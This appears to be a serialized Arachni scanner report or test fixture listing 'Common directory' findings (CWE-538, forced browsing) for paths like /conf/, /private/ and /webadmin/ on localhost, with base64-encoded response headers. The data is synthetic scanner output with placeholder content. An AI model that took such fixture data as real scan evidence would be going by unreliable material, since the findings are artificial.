mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/website/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/website/ injected: website id: website elem: path remarks: {} method: '' response: website headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/setup/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/setup/ injected: setup id: setup elem: path remarks: {} method: '' response: setup headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/conf/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/conf/ injected: conf id: conf elem: path remarks: {} method: '' response: conf headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/config/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/config/ injected: config id: config elem: path remarks: {} method: '' response: config headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/install/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/install/ injected: install id: install elem: path remarks: {} method: '' response: install headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/users/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/users/ injected: users id: users elem: path remarks: {} method: '' response: users headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/installer/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/installer/ injected: installer id: installer elem: path remarks: {} method: '' response: installer headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/intranet/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/intranet/ injected: intranet id: intranet elem: path remarks: {} method: '' response: intranet headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/tree/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/tree/ injected: tree id: tree elem: path remarks: {} method: '' response: tree headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/pages/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/pages/ injected: pages id: pages elem: path remarks: {} method: '' response: pages headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/inventory/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/inventory/ injected: inventory id: inventory elem: path remarks: {} method: '' response: inventory headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/private/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/private/ injected: private id: private elem: path remarks: {} method: '' response: private headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/webadmin/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/webadmin/ injected: webadmin id: webadmin elem: path remarks: {} method: '' response: webadmin headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/accounting/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/accounting/ injected: accounting id: accounting elem: path remarks: :stuff: - Blah - Blah2 method: '' response: accounting headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTA= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/shop/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/shop/ injected: shop id: shop elem: path remarks: {} method: '' response: shop headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/employees/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/employees/ injected: employees id: employees elem: path remarks: {} method: '' response: employees headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
